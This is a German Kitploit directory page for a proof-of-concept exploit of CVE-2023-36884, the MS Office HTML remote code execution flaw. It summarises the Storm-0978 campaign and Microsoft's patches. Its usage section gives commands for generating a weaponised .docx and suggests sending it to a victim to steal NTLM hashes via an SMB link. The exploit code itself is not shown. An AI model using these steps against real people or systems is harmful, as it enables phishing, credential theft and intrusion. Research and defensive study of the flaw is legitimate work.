Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-36884-MS-Office-HTML-RCE — MS Office und Windows HTML RCE (CVE-2023-36884) - PoC und Exploit | Kitploit
Tools/GitHubGitHub/jakabakos/cve-2023-36884-ms-office-html-rce
Phishing-ToolsPayload-GenerierungExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubjakabakos/cve-2023-36884-ms-office-html-rce

CVE-2023-36884-MS-Office-HTML-RCE

MS Office und Windows HTML RCE (CVE-2023-36884) - PoC und Exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
42104vor 2 JahrenVon Kitploit geprüft

CVE-2023-36884: MS Office HTML RCE mit manipulierten Dokumenten

Am 11. Juli 2023 veröffentlichte Microsoft einen Patch, der darauf abzielte, mehrere aktiv ausgenutzte Sicherheitslücken zur Remotecodeausführung (RCE) zu beheben. Diese Maßnahme brachte auch eine Phishing-Kampagne ans Licht, die von einem als Storm-0978 bekannten Bedrohungsakteur orchestriert wurde und gezielt Organisationen in Europa und Nordamerika angriff. Im Mittelpunkt dieser Kampagne stand eine Zero-Day-Schwachstelle mit der Bezeichnung CVE-2023-36884, die es dem Angreifer ermöglichte, Windows-Suchdateien durch sorgfältig erstellte Office Open eXtensible Markup Language (OOXML)-Dokumente mit geopolitischen Ködern im Zusammenhang mit dem Ukraine World Congress (UWC) auszunutzen. Obwohl zunächst eine Problemumgehung zur Eindämmung dieser Sicherheitslücke vorgeschlagen wurde, veröffentlichte Microsoft am 8. August 2023 ein Office Defense in Depth-Update, das die Angriffskette, die über Windows-Suchdateien (*.search-ms) zu RCE führte, effektiv unterbrach.

Blogbeitrag

Dieses Exploit-Skript wurde für eine CVE-Analyse auf vsociety geschrieben.

Verwendung

PIP-Pakete installieren:

root@kitploit:~
pip install python-docx pywin32                                                         

Eine example.html-Datei erstellen und einen Python-HTTP-Webserver starten:

root@kitploit:~
New-Item -Path "example.html" - ItemType File
python -m http.server 8888

Dann das Skript ausführen:

root@kitploit:~
python gen_docx_with_rtf_altchunk.py merged.docx autolinked.rtf http://localhost:8888/example.html

Die erzeugte Datei kann nun per E-Mail oder auf andere Weise mit Ihrem Opfer geteilt werden. Der Link kann auf Ihren SMB-Server verweisen, um den NTLM-Hash des Opfers zu stehlen, oder auf eine HTML-Datei, die wie in der ursprünglichen Malware einen iframe mit einem Verweis auf eine Windows-Suchdatei enthält. Aufgrund fehlender weiterer Informationen kann die genaue Ausnutzung nicht gezeigt werden.

Haftungsausschluss

Dieses Exploit-Skript wurde ausschließlich zu Forschungszwecken und für die Entwicklung effektiver Abwehrtechniken erstellt. Es ist nicht für böswillige oder unbefugte Aktivitäten bestimmt. Der Autor und Besitzer des Skripts lehnen jegliche Verantwortung oder Haftung für Missbrauch oder Schäden ab, die durch diese Software verursacht werden. Benutzer werden dringend gebeten, diese Software verantwortungsvoll und nur in Übereinstimmung mit den geltenden Gesetzen und Vorschriften zu verwenden. Verantwortungsvoll nutzen.

Tool herunterladen